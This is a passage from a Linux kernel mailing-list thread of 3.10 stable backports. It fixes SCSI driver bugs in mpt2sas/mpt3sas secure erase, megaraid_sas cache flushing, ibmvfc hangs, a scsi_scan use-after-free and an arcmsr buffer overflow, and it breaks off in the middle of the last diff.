Signed-off-by: Andrey Grodzovsky <andrey2805@gmail.com>
Acked-by: Sreekanth Reddy <Sreekanth.Reddy@broadcom.com>
Cc: <linux-scsi@vger.kernel.org>
Cc: Sathya Prakash <sathya.prakash@broadcom.com>
Cc: Chaitra P B <chaitra.basappa@broadcom.com>
Cc: Suganath Prabu Subramani <suganath-prabu.subramani@broadcom.com>
Cc: Sreekanth Reddy <Sreekanth.Reddy@broadcom.com>
Cc: Hannes Reinecke <hare@suse.de>
Signed-off-by: Martin K. Petersen <martin.petersen@oracle.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/scsi/mpt3sas/mpt3sas_scsih.c | 14 ++++++++++++++
 1 file changed, 14 insertions(+)

diff --git a/drivers/scsi/mpt3sas/mpt3sas_scsih.c b/drivers/scsi/mpt3sas/mpt3sas_scsih.c
index f8c4b85..e414b71 100644
--- a/drivers/scsi/mpt3sas/mpt3sas_scsih.c
+++ b/drivers/scsi/mpt3sas/mpt3sas_scsih.c
@@ -3515,6 +3515,10 @@ _scsih_eedp_error_handling(struct scsi_cmnd *scmd, u16 ioc_status)
 	    SAM_STAT_CHECK_CONDITION;
 }
 
+static inline bool ata_12_16_cmd(struct scsi_cmnd *scmd)
+{
+	return (scmd->cmnd[0] == ATA_12 || scmd->cmnd[0] == ATA_16);
+}
 
 /**
  * _scsih_qcmd_lck - main scsi request entry point
@@ -3543,6 +3547,13 @@ _scsih_qcmd_lck(struct scsi_cmnd *scmd, void (*done)(struct scsi_cmnd *))
 		scsi_print_command(scmd);
 #endif
 
+	/*
+	 * Lock the device for any subsequent command until command is
+	 * done.
+	 */
+	if (ata_12_16_cmd(scmd))
+		scsi_internal_device_block(scmd->device);
+
 	scmd->scsi_done = done;
 	sas_device_priv_data = scmd->device->hostdata;
 	if (!sas_device_priv_data || !sas_device_priv_data->sas_target) {
@@ -4046,6 +4057,9 @@ _scsih_io_done(struct MPT3SAS_ADAPTER *ioc, u16 smid, u8 msix_index, u32 reply)
 	if (scmd == NULL)
 		return 1;
 
+	if (ata_12_16_cmd(scmd))
+		scsi_internal_device_unblock(scmd->device, SDEV_RUNNING);
+
 	mpi_request = mpt3sas_base_get_msg_frame(ioc, smid);
 
 	if (mpi_reply == NULL) {
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 142/319] mpt2sas: Fix secure erase premature termination
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (40 preceding siblings ...)
  2017-02-05 19:19 ` [PATCH 3.10 141/319] scsi: mpt3sas: Fix secure erase premature termination Willy Tarreau
@ 2017-02-05 19:19 ` Willy Tarreau
  2017-02-05 19:19 ` [PATCH 3.10 143/319] scsi: megaraid_sas: Fix data integrity failure for JBOD (passthrough) devices Willy Tarreau
                   ` (176 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:19 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Andrey Grodzovsky, Sreekanth Reddy, Hannes Reinecke,
	PDL-MPT-FUSIONLINUX, Martin K . Petersen, Willy Tarreau

From: Andrey Grodzovsky <andrey2805@gmail.com>

Problem:
This is a workaround for a bug with LSI Fusion MPT SAS2 when
performing secure erase. Due to the very long time the operation
takes, commands issued during the erase will time out and will trigger
execution of the abort hook. Even though the abort hook is called only for
the specific command which timed out, this leads to a halt of the entire
device (scsi_state terminated) and premature termination of the secure erase.

Fix:
Set device state to busy while the erase is in progress to reject any
incoming commands until the erase is done. The device is blocked anyway
during this time and cannot execute any other command.
More data and logs can be found here -
https://drive.google.com/file/d/0B9ocOHYHbbS1Q3VMdkkzeWFkTjg/view

P.S.
This is a backport of the same fix for the mpt3sas driver, intended
for pre-4.4 stable trees.

Signed-off-by: Andrey Grodzovsky <andrey2805@gmail.com>
Cc: Sreekanth Reddy <Sreekanth.Reddy@broadcom.com>
Cc: Hannes Reinecke <hare@suse.de>
Cc: PDL-MPT-FUSIONLINUX <MPT-FusionLinux.pdl@broadcom.com>
Cc: Martin K. Petersen <martin.petersen@oracle.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/scsi/mpt2sas/mpt2sas_scsih.c | 15 +++++++++++++++
 1 file changed, 15 insertions(+)

diff --git a/drivers/scsi/mpt2sas/mpt2sas_scsih.c b/drivers/scsi/mpt2sas/mpt2sas_scsih.c
index fe76185..64caa5c 100644
--- a/drivers/scsi/mpt2sas/mpt2sas_scsih.c
+++ b/drivers/scsi/mpt2sas/mpt2sas_scsih.c
@@ -3926,6 +3926,11 @@ _scsih_setup_direct_io(struct MPT2SAS_ADAPTER *ioc, struct scsi_cmnd *scmd,
 	}
 }
 
+static inline bool ata_12_16_cmd(struct scsi_cmnd *scmd)
+{
+	return (scmd->cmnd[0] == ATA_12 || scmd->cmnd[0] == ATA_16);
+}
+
 /**
  * _scsih_qcmd - main scsi request entry point
  * @scmd: pointer to scsi command object
@@ -3948,6 +3953,13 @@ _scsih_qcmd_lck(struct scsi_cmnd *scmd, void (*done)(struct scsi_cmnd *))
 	u32 mpi_control;
 	u16 smid;
 
+	/**
+	* Lock the device for any subsequent command until
+	* command is done.
+	*/
+	if (ata_12_16_cmd(scmd))
+		scsi_internal_device_block(scmd->device);
+
 	scmd->scsi_done = done;
 	sas_device_priv_data = scmd->device->hostdata;
 	if (!sas_device_priv_data || !sas_device_priv_data->sas_target) {
@@ -4454,6 +4466,9 @@ _scsih_io_done(struct MPT2SAS_ADAPTER *ioc, u16 smid, u8 msix_index, u32 reply)
 	if (scmd == NULL)
 		return 1;
 
+	if (ata_12_16_cmd(scmd))
+		scsi_internal_device_unblock(scmd->device, SDEV_RUNNING);
+
 	mpi_request = mpt2sas_base_get_msg_frame(ioc, smid);
 
 	if (mpi_reply == NULL) {
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 143/319] scsi: megaraid_sas: Fix data integrity failure for JBOD (passthrough) devices
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (41 preceding siblings ...)
  2017-02-05 19:19 ` [PATCH 3.10 142/319] mpt2sas: " Willy Tarreau
@ 2017-02-05 19:19 ` Willy Tarreau
  2017-02-05 19:19 ` [PATCH 3.10 144/319] scsi: megaraid_sas: fix macro MEGASAS_IS_LOGICAL to avoid regression Willy Tarreau
                   ` (175 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:19 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Kashyap Desai, Sumit Saxena, Martin K . Petersen, Willy Tarreau

From: Kashyap Desai <kashyap.desai@broadcom.com>

commit 1e793f6fc0db920400574211c48f9157a37e3945 upstream.

Commit 02b01e010afe ("megaraid_sas: return sync cache call with
success") modified the driver to successfully complete SYNCHRONIZE_CACHE
commands without passing them to the controller. Disk drive caches are
only explicitly managed by controller firmware when operating in RAID
mode. So this commit effectively disabled writeback cache flushing for
any drives used in JBOD mode, leading to data integrity failures.

[mkp: clarified patch description]

Fixes: 02b01e010afeeb49328d35650d70721d2ca3fd59
Signed-off-by: Kashyap Desai <kashyap.desai@broadcom.com>
Signed-off-by: Sumit Saxena <sumit.saxena@broadcom.com>
Reviewed-by: Tomas Henzl <thenzl@redhat.com>
Reviewed-by: Hannes Reinecke <hare@suse.com>
Reviewed-by: Ewan D. Milne <emilne@redhat.com>
Signed-off-by: Martin K. Petersen <martin.petersen@oracle.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/scsi/megaraid/megaraid_sas_base.c | 13 +++++--------
 1 file changed, 5 insertions(+), 8 deletions(-)

diff --git a/drivers/scsi/megaraid/megaraid_sas_base.c b/drivers/scsi/megaraid/megaraid_sas_base.c
index 6ced6a3..0626a16 100644
--- a/drivers/scsi/megaraid/megaraid_sas_base.c
+++ b/drivers/scsi/megaraid/megaraid_sas_base.c
@@ -1487,16 +1487,13 @@ megasas_queue_command_lck(struct scsi_cmnd *scmd, void (*done) (struct scsi_cmnd
 		goto out_done;
 	}
 
-	switch (scmd->cmnd[0]) {
-	case SYNCHRONIZE_CACHE:
-		/*
-		 * FW takes care of flush cache on its own
-		 * No need to send it down
-		 */
+	/*
+	 * FW takes care of flush cache on its own for Virtual Disk.
+	 * No need to send it down for VD. For JBOD send SYNCHRONIZE_CACHE to FW.
+	 */
+	if ((scmd->cmnd[0] == SYNCHRONIZE_CACHE) && MEGASAS_IS_LOGICAL(scmd)) {
 		scmd->result = DID_OK << 16;
 		goto out_done;
-	default:
-		break;
 	}
 
 	if (instance->instancet->build_and_issue_cmd(instance, scmd)) {
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 144/319] scsi: megaraid_sas: fix macro MEGASAS_IS_LOGICAL to avoid regression
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (42 preceding siblings ...)
  2017-02-05 19:19 ` [PATCH 3.10 143/319] scsi: megaraid_sas: Fix data integrity failure for JBOD (passthrough) devices Willy Tarreau
@ 2017-02-05 19:19 ` Willy Tarreau
  2017-02-05 19:19 ` [PATCH 3.10 145/319] scsi: ibmvfc: Fix I/O hang when port is not mapped Willy Tarreau
                   ` (174 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:19 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Sumit Saxena, Kashyap Desai, Martin K . Petersen, Willy Tarreau

From: Sumit Saxena <sumit.saxena@broadcom.com>

commit 5e5ec1759dd663a1d5a2f10930224dd009e500e8 upstream.

This patch fixes a regression caused by commit 1e793f6fc0db ("scsi:
megaraid_sas: Fix data integrity failure for JBOD (passthrough)
devices").

The problem was that the body of the MEGASAS_IS_LOGICAL macro was not
wrapped in parentheses, so its conditional operator absorbed the
surrounding expression at the call site. As a result the driver ended up
exposing a lot of non-existing SCSI devices (all SCSI commands to
channels 1,2,3 were returned as SUCCESS-DID_OK by the driver).
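
The precedence problem can be reproduced outside the driver. The sketch below is a simplified illustration, not the driver code: the macro and function names are hypothetical, and the channel limit of 2 is an assumed stand-in for MEGASAS_MAX_PD_CHANNELS. It combines an opcode test with the macro using &&, in the same shape as the check added by commit 1e793f6fc0db.

```c
#include <stdbool.h>

#define MAX_PD_CHANNELS	2	/* illustrative stand-in for MEGASAS_MAX_PD_CHANNELS */
#define OP_SYNC_CACHE	0x35	/* SCSI SYNCHRONIZE CACHE(10) opcode */
#define OP_READ_10	0x28	/* SCSI READ(10) opcode */

/* Shape of the macro before the fix: no outer parentheses. */
#define IS_LOGICAL_UNPARENTHESIZED(ch)	((ch) < MAX_PD_CHANNELS) ? 0 : 1
/* Shape of the macro after the fix. */
#define IS_LOGICAL_PARENTHESIZED(ch)	(((ch) < MAX_PD_CHANNELS) ? 0 : 1)

/*
 * Expands to ((opcode == OP_SYNC_CACHE) && (ch < 2)) ? 0 : 1,
 * because && binds tighter than ?:.
 */
static bool completes_early_before_fix(int opcode, int ch)
{
	return (opcode == OP_SYNC_CACHE) && IS_LOGICAL_UNPARENTHESIZED(ch);
}

/* Expands to (opcode == OP_SYNC_CACHE) && ((ch < 2) ? 0 : 1). */
static bool completes_early_after_fix(int opcode, int ch)
{
	return (opcode == OP_SYNC_CACHE) && IS_LOGICAL_PARENTHESIZED(ch);
}
```

In this model the unparenthesized form evaluates to true for a READ(10), which is never a cache flush, while the parenthesized form is true only for SYNCHRONIZE CACHE on a logical channel.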

[mkp: clarified patch description]

Fixes: 1e793f6fc0db920400574211c48f9157a37e3945
Reported-by: Jens Axboe <axboe@kernel.dk>
Signed-off-by: Kashyap Desai <kashyap.desai@broadcom.com>
Signed-off-by: Sumit Saxena <sumit.saxena@broadcom.com>
Tested-by: Sumit Saxena <sumit.saxena@broadcom.com>
Reviewed-by: Tomas Henzl <thenzl@redhat.com>
Tested-by: Jens Axboe <axboe@fb.com>
Signed-off-by: Martin K. Petersen <martin.petersen@oracle.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/scsi/megaraid/megaraid_sas.h | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/drivers/scsi/megaraid/megaraid_sas.h b/drivers/scsi/megaraid/megaraid_sas.h
index 280e769..a0e0a61 100644
--- a/drivers/scsi/megaraid/megaraid_sas.h
+++ b/drivers/scsi/megaraid/megaraid_sas.h
@@ -1402,7 +1402,7 @@ struct megasas_instance_template {
 };
 
 #define MEGASAS_IS_LOGICAL(scp)						\
-	(scp->device->channel < MEGASAS_MAX_PD_CHANNELS) ? 0 : 1
+	((scp->device->channel < MEGASAS_MAX_PD_CHANNELS) ? 0 : 1)
 
 #define MEGASAS_DEV_INDEX(inst, scp)					\
 	((scp->device->channel % 2) * MEGASAS_MAX_DEV_PER_CHANNEL) + 	\
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 145/319] scsi: ibmvfc: Fix I/O hang when port is not mapped
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (43 preceding siblings ...)
  2017-02-05 19:19 ` [PATCH 3.10 144/319] scsi: megaraid_sas: fix macro MEGASAS_IS_LOGICAL to avoid regression Willy Tarreau
@ 2017-02-05 19:19 ` Willy Tarreau
  2017-02-05 19:19 ` [PATCH 3.10 146/319] scsi: Fix use-after-free Willy Tarreau
                   ` (173 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:19 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Brian King, Martin K . Petersen, Willy Tarreau

From: Brian King <brking@linux.vnet.ibm.com>

commit 07d0e9a847401ffd2f09bd450d41644cd090e81d upstream.

If a VFC port gets unmapped in the VIOS, it may not respond with a CRQ
init complete following H_REG_CRQ. If this occurs, we can end up having
called scsi_block_requests without a matching unblock until the init
complete arrives, which may never happen, and I/O requests hang.
This patch ensures the host action stays set to
IBMVFC_HOST_ACTION_TGT_DEL so we move all rports into devloss state and
unblock unless we receive an init complete.

Signed-off-by: Brian King <brking@linux.vnet.ibm.com>
Acked-by: Tyrel Datwyler <tyreld@linux.vnet.ibm.com>
Signed-off-by: Martin K. Petersen <martin.petersen@oracle.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/scsi/ibmvscsi/ibmvfc.c | 1 -
 1 file changed, 1 deletion(-)

diff --git a/drivers/scsi/ibmvscsi/ibmvfc.c b/drivers/scsi/ibmvscsi/ibmvfc.c
index 4e31caa..9206861 100644
--- a/drivers/scsi/ibmvscsi/ibmvfc.c
+++ b/drivers/scsi/ibmvscsi/ibmvfc.c
@@ -717,7 +717,6 @@ static int ibmvfc_reset_crq(struct ibmvfc_host *vhost)
 	spin_lock_irqsave(vhost->host->host_lock, flags);
 	vhost->state = IBMVFC_NO_CRQ;
 	vhost->logged_in = 0;
-	ibmvfc_set_host_action(vhost, IBMVFC_HOST_ACTION_NONE);
 
 	/* Clean out the queue */
 	memset(crq->msgs, 0, PAGE_SIZE);
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 146/319] scsi: Fix use-after-free
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (44 preceding siblings ...)
  2017-02-05 19:19 ` [PATCH 3.10 145/319] scsi: ibmvfc: Fix I/O hang when port is not mapped Willy Tarreau
@ 2017-02-05 19:19 ` Willy Tarreau
  2017-02-05 19:19 ` [PATCH 3.10 147/319] scsi: arcmsr: Buffer overflow in arcmsr_iop_message_xfer() Willy Tarreau
                   ` (172 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:19 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Ming Lei, Christoph Hellwig, Martin K . Petersen, Willy Tarreau

From: Ming Lei <tom.leiming@gmail.com>

commit bcd8f2e94808fcddf6ef3af5f060a36820dcc432 upstream.

This patch fixes a use-after-free reported[1] by KASAN.

In __scsi_scan_target(), when a type 31 device is probed,
SCSI_SCAN_TARGET_PRESENT is returned and the target will be scanned
again.

Inside the following scsi_report_lun_scan(), a new scsi_device
instance is allocated, and scsi_probe_and_add_lun() is called again to
probe the target. It still sees a type 31 device, so
__scsi_remove_device() is finally called to remove and free the device
at the end of scsi_probe_and_add_lun(), which causes a use-after-free in
scsi_report_lun_scan().

And the following SCSI log can be observed:

	scsi 0:0:2:0: scsi scan: INQUIRY pass 1 length 36
	scsi 0:0:2:0: scsi scan: INQUIRY successful with code 0x0
	scsi 0:0:2:0: scsi scan: peripheral device type of 31, no device added
	scsi 0:0:2:0: scsi scan: Sending REPORT LUNS to (try 0)
	scsi 0:0:2:0: scsi scan: REPORT LUNS successful (try 0) result 0x0
	scsi 0:0:2:0: scsi scan: REPORT LUN scan
	scsi 0:0:2:0: scsi scan: INQUIRY pass 1 length 36
	scsi 0:0:2:0: scsi scan: INQUIRY successful with code 0x0
	scsi 0:0:2:0: scsi scan: peripheral device type of 31, no device added
	BUG: KASAN: use-after-free in __scsi_scan_target+0xbf8/0xe40 at addr ffff88007b44a104

This patch fixes the issue by moving the reference put to
the end of scsi_report_lun_scan().
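
Why the position of the put matters can be shown with a small user-space model. This is a sketch under assumptions, not the SCSI midlayer code: struct model_dev and all helpers are hypothetical, and a "freed" flag stands in for the real release of memory so that the model itself never touches freed storage.

```c
#include <stdbool.h>

/* Hypothetical refcounted object; `freed` stands in for a real free(). */
struct model_dev {
	int refs;
	bool freed;
	bool created;	/* plays the role of state inspected during cleanup */
};

static void model_put(struct model_dev *dev)
{
	if (--dev->refs == 0)
		dev->freed = true;	/* a real put would release the memory here */
}

/* Put first: returns true if the object is gone before cleanup inspects it. */
static bool cleanup_put_first(struct model_dev *dev)
{
	bool touched_after_free;

	model_put(dev);				/* may drop the last reference */
	touched_after_free = dev->freed;	/* a real access here would be a UAF */
	return touched_after_free;
}

/* Put last: cleanup inspects the object while a reference is still held. */
static bool cleanup_put_last(struct model_dev *dev)
{
	bool touched_after_free = dev->freed;	/* still holding our reference */

	(void)dev->created;			/* safe: object is still alive */
	model_put(dev);				/* drop the reference last */
	return touched_after_free;
}
```

In the model, dropping the last reference before the final inspection leaves cleanup looking at an object that is already gone, whereas dropping it afterwards does not.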

[1] KASAN report
==================================================================
[    3.274597] PM: Adding info for serio:serio1
[    3.275127] BUG: KASAN: use-after-free in __scsi_scan_target+0xd87/0xdf0 at addr ffff880254d8c304
[    3.275653] Read of size 4 by task kworker/u10:0/27
[    3.275903] CPU: 3 PID: 27 Comm: kworker/u10:0 Not tainted 4.8.0 #2121
[    3.276258] Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS Ubuntu-1.8.2-1ubuntu1 04/01/2014
[    3.276797] Workqueue: events_unbound async_run_entry_fn
[    3.277083]  ffff880254d8c380 ffff880259a37870 ffffffff94bbc6c1 ffff880078402d80
[    3.277532]  ffff880254d8bb80 ffff880259a37898 ffffffff9459fec1 ffff880259a37930
[    3.277989]  ffff880254d8bb80 ffff880078402d80 ffff880259a37920 ffffffff945a0165
[    3.278436] Call Trace:
[    3.278528]  [<ffffffff94bbc6c1>] dump_stack+0x65/0x84
[    3.278797]  [<ffffffff9459fec1>] kasan_object_err+0x21/0x70
[    3.279063] device: 'psaux': device_add
[    3.279616]  [<ffffffff945a0165>] kasan_report_error+0x205/0x500
[    3.279651] PM: Adding info for No Bus:psaux
[    3.280202]  [<ffffffff944ecd22>] ? kfree_const+0x22/0x30
[    3.280486]  [<ffffffff94bc2dc9>] ? kobject_release+0x119/0x370
[    3.280805]  [<ffffffff945a0543>] __asan_report_load4_noabort+0x43/0x50
[    3.281170]  [<ffffffff9507e1f7>] ? __scsi_scan_target+0xd87/0xdf0
[    3.281506]  [<ffffffff9507e1f7>] __scsi_scan_target+0xd87/0xdf0
[    3.281848]  [<ffffffff9507d470>] ? scsi_add_device+0x30/0x30
[    3.282156]  [<ffffffff94f7f660>] ? pm_runtime_autosuspend_expiration+0x60/0x60
[    3.282570]  [<ffffffff956ddb07>] ? _raw_spin_lock+0x17/0x40
[    3.282880]  [<ffffffff9507e505>] scsi_scan_channel+0x105/0x160
[    3.283200]  [<ffffffff9507e8a2>] scsi_scan_host_selected+0x212/0x2f0
[    3.283563]  [<ffffffff9507eb3c>] do_scsi_scan_host+0x1bc/0x250
[    3.283882]  [<ffffffff9507efc1>] do_scan_async+0x41/0x450
[    3.284173]  [<ffffffff941c1fee>] async_run_entry_fn+0xfe/0x610
[    3.284492]  [<ffffffff941a8954>] ? pwq_dec_nr_in_flight+0x124/0x2a0
[    3.284876]  [<ffffffff941d1770>] ? preempt_count_add+0x130/0x160
[    3.285207]  [<ffffffff941a9a84>] process_one_work+0x544/0x12d0
[    3.285526]  [<ffffffff941aa8e9>] worker_thread+0xd9/0x12f0
[    3.285844]  [<ffffffff941aa810>] ? process_one_work+0x12d0/0x12d0
[    3.286182]  [<ffffffff941bb365>] kthread+0x1c5/0x260
[    3.286443]  [<ffffffff940855cd>] ? __switch_to+0x88d/0x1430
[    3.286745]  [<ffffffff941bb1a0>] ? kthread_worker_fn+0x5a0/0x5a0
[    3.287085]  [<ffffffff956dde9f>] ret_from_fork+0x1f/0x40
[    3.287368]  [<ffffffff941bb1a0>] ? kthread_worker_fn+0x5a0/0x5a0
[    3.287697] Object at ffff880254d8bb80, in cache kmalloc-2048 size: 2048
[    3.288064] Allocated:
[    3.288147] PID = 27
[    3.288218]  [<ffffffff940b27ab>] save_stack_trace+0x2b/0x50
[    3.288531]  [<ffffffff9459f246>] save_stack+0x46/0xd0
[    3.288806]  [<ffffffff9459f4bd>] kasan_kmalloc+0xad/0xe0
[    3.289098]  [<ffffffff9459c07e>] __kmalloc+0x13e/0x250
[    3.289378]  [<ffffffff95078e5a>] scsi_alloc_sdev+0xea/0xcf0
[    3.289701]  [<ffffffff9507de76>] __scsi_scan_target+0xa06/0xdf0
[    3.290034]  [<ffffffff9507e505>] scsi_scan_channel+0x105/0x160
[    3.290362]  [<ffffffff9507e8a2>] scsi_scan_host_selected+0x212/0x2f0
[    3.290724]  [<ffffffff9507eb3c>] do_scsi_scan_host+0x1bc/0x250
[    3.291055]  [<ffffffff9507efc1>] do_scan_async+0x41/0x450
[    3.291354]  [<ffffffff941c1fee>] async_run_entry_fn+0xfe/0x610
[    3.291695]  [<ffffffff941a9a84>] process_one_work+0x544/0x12d0
[    3.292022]  [<ffffffff941aa8e9>] worker_thread+0xd9/0x12f0
[    3.292325]  [<ffffffff941bb365>] kthread+0x1c5/0x260
[    3.292594]  [<ffffffff956dde9f>] ret_from_fork+0x1f/0x40
[    3.292886] Freed:
[    3.292945] PID = 27
[    3.293016]  [<ffffffff940b27ab>] save_stack_trace+0x2b/0x50
[    3.293327]  [<ffffffff9459f246>] save_stack+0x46/0xd0
[    3.293600]  [<ffffffff9459fa61>] kasan_slab_free+0x71/0xb0
[    3.293916]  [<ffffffff9459bac2>] kfree+0xa2/0x1f0
[    3.294168]  [<ffffffff9508158a>] scsi_device_dev_release_usercontext+0x50a/0x730
[    3.294598]  [<ffffffff941ace9a>] execute_in_process_context+0xda/0x130
[    3.294974]  [<ffffffff9508107c>] scsi_device_dev_release+0x1c/0x20
[    3.295322]  [<ffffffff94f566f6>] device_release+0x76/0x1e0
[    3.295626]  [<ffffffff94bc2db7>] kobject_release+0x107/0x370
[    3.295942]  [<ffffffff94bc29ce>] kobject_put+0x4e/0xa0
[    3.296222]  [<ffffffff94f56e17>] put_device+0x17/0x20
[    3.296497]  [<ffffffff9505201c>] scsi_device_put+0x7c/0xa0
[    3.296801]  [<ffffffff9507e1bc>] __scsi_scan_target+0xd4c/0xdf0
[    3.297132]  [<ffffffff9507e505>] scsi_scan_channel+0x105/0x160
[    3.297458]  [<ffffffff9507e8a2>] scsi_scan_host_selected+0x212/0x2f0
[    3.297829]  [<ffffffff9507eb3c>] do_scsi_scan_host+0x1bc/0x250
[    3.298156]  [<ffffffff9507efc1>] do_scan_async+0x41/0x450
[    3.298453]  [<ffffffff941c1fee>] async_run_entry_fn+0xfe/0x610
[    3.298777]  [<ffffffff941a9a84>] process_one_work+0x544/0x12d0
[    3.299105]  [<ffffffff941aa8e9>] worker_thread+0xd9/0x12f0
[    3.299408]  [<ffffffff941bb365>] kthread+0x1c5/0x260
[    3.299676]  [<ffffffff956dde9f>] ret_from_fork+0x1f/0x40
[    3.299967] Memory state around the buggy address:
[    3.300209]  ffff880254d8c200: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
[    3.300608]  ffff880254d8c280: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
[    3.300986] >ffff880254d8c300: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
[    3.301408]                    ^
[    3.301550]  ffff880254d8c380: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
[    3.301987]  ffff880254d8c400: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
[    3.302396]
==================================================================

Cc: Christoph Hellwig <hch@lst.de>
Signed-off-by: Ming Lei <tom.leiming@gmail.com>
Reviewed-by: Christoph Hellwig <hch@lst.de>
Signed-off-by: Martin K. Petersen <martin.petersen@oracle.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/scsi/scsi_scan.c | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/drivers/scsi/scsi_scan.c b/drivers/scsi/scsi_scan.c
index 8592404..92d4f65 100644
--- a/drivers/scsi/scsi_scan.c
+++ b/drivers/scsi/scsi_scan.c
@@ -1517,12 +1517,12 @@ static int scsi_report_lun_scan(struct scsi_target *starget, int bflags,
  out_err:
 	kfree(lun_data);
  out:
-	scsi_device_put(sdev);
 	if (scsi_device_created(sdev))
 		/*
 		 * the sdev we used didn't appear in the report luns scan
 		 */
 		__scsi_remove_device(sdev);
+	scsi_device_put(sdev);
 	return ret;
 }
 
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 147/319] scsi: arcmsr: Buffer overflow in arcmsr_iop_message_xfer()
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (45 preceding siblings ...)
  2017-02-05 19:19 ` [PATCH 3.10 146/319] scsi: Fix use-after-free Willy Tarreau
@ 2017-02-05 19:19 ` Willy Tarreau
  2017-02-05 19:19 ` [PATCH 3.10 148/319] scsi: scsi_debug: Fix memory leak if LBP enabled and module is unloaded Willy Tarreau
                   ` (171 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:19 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Dan Carpenter, Martin K . Petersen, Jiri Slaby, Willy Tarreau

From: Dan Carpenter <dan.carpenter@oracle.com>

commit 7bc2b55a5c030685b399bb65b6baa9ccc3d1f167 upstream.

We need to put an upper bound on "user_len" so the memcpy() doesn't
overflow.
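
A minimal user-space sketch of the bound check follows. The names
toy_copy_message() and TOY_BUF_LEN are made up for illustration; only the
value 1032 comes from the patch. Making the length unsigned matters as
much as the comparison: a value that would be negative as int32_t becomes
a huge unsigned number and is rejected by the same test.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

#define TOY_BUF_LEN 1032u	/* same size as the kmalloc(1032) buffer */

/*
 * Copy user_len bytes into a TOY_BUF_LEN-byte buffer.
 * Returns 0 on success, -1 if the length is out of bounds.
 */
static int toy_copy_message(uint8_t *dst, const uint8_t *src,
			    uint32_t user_len)
{
	assert(dst != NULL && src != NULL);
	if (user_len > TOY_BUF_LEN)
		return -1;	/* reject before memcpy() can overflow dst */
	memcpy(dst, src, user_len);
	return 0;
}
```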

[js] no ARCMSR_API_DATA_BUFLEN defined, use the number

Reported-by: Marco Grassi <marco.gra@gmail.com>
Signed-off-by: Dan Carpenter <dan.carpenter@oracle.com>
Reviewed-by: Tomas Henzl <thenzl@redhat.com>
Signed-off-by: Martin K. Petersen <martin.petersen@oracle.com>
Signed-off-by: Jiri Slaby <jslaby@suse.cz>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/scsi/arcmsr/arcmsr_hba.c | 8 +++++++-
 1 file changed, 7 insertions(+), 1 deletion(-)

diff --git a/drivers/scsi/arcmsr/arcmsr_hba.c b/drivers/scsi/arcmsr/arcmsr_hba.c
index 1822cb9..66dda86 100644
--- a/drivers/scsi/arcmsr/arcmsr_hba.c
+++ b/drivers/scsi/arcmsr/arcmsr_hba.c
@@ -1803,7 +1803,8 @@ static int arcmsr_iop_message_xfer(struct AdapterControlBlock *acb,
 
 	case ARCMSR_MESSAGE_WRITE_WQBUFFER: {
 		unsigned char *ver_addr;
-		int32_t my_empty_len, user_len, wqbuf_firstindex, wqbuf_lastindex;
+		uint32_t user_len;
+		int32_t my_empty_len, wqbuf_firstindex, wqbuf_lastindex;
 		uint8_t *pQbuffer, *ptmpuserbuffer;
 
 		ver_addr = kmalloc(1032, GFP_ATOMIC);
@@ -1820,6 +1821,11 @@ static int arcmsr_iop_message_xfer(struct AdapterControlBlock *acb,
 		}
 		ptmpuserbuffer = ver_addr;
